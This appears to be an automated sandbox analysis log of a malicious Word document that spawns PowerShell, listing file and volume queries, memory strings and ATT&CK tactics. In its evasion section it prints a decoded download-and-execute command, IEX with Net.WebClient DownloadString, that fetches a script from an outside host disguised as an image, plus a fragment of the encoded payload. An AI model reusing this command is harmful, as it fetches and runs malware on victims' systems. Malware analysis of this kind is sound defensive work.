      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4456
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5170
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 | Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-VMScsiControllerxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $controllers = Get-VMScsiController -VM $currentVm `
      Source: powershell.exe, 00000004.00000002.12721820498.000002ADE08BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWgA%SystemRoot%\system32\mswsock.dllgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQB
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-VMScsiControllerP
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $_.VirtualSystemType -eq 'Microsoft:Hyper-V:System:Realized'
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-VMScsiController(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: !Microsoft:Hyper-V:System:Realized(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Import-Module Hyper-V
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC936B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMwareESXi
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC98A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMwareESXiH^
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'xBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -Filter "ResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'" `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xml(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *Microsoft.HyperV.PowerShell.VirtualMachineGX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxml(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [Microsoft.HyperV.PowerShell.VirtualMachine[]]
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC98A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <Value Name="VMwareESXi" Value="19" />
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: !Microsoft:Hyper-V:System:RealizedxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: # Hyper-V enforces a max of 64 locations per controller
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $controllers = Get-VMScsiController -VM $vms `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $controller = Get-VMScsiController -VM $currentVm `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-VxBX%
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_7996.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7996, type: MEMORYSTR
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.22621.4036.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-US~10.0.22621.3958.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0519~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.22621.4111.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05110~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.22621.4169.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll | VolumeInformation
MITRE ATT&CK Matrix (techniques grouped by tactic; a leading number is the signature count shown in the original matrix for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 2 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
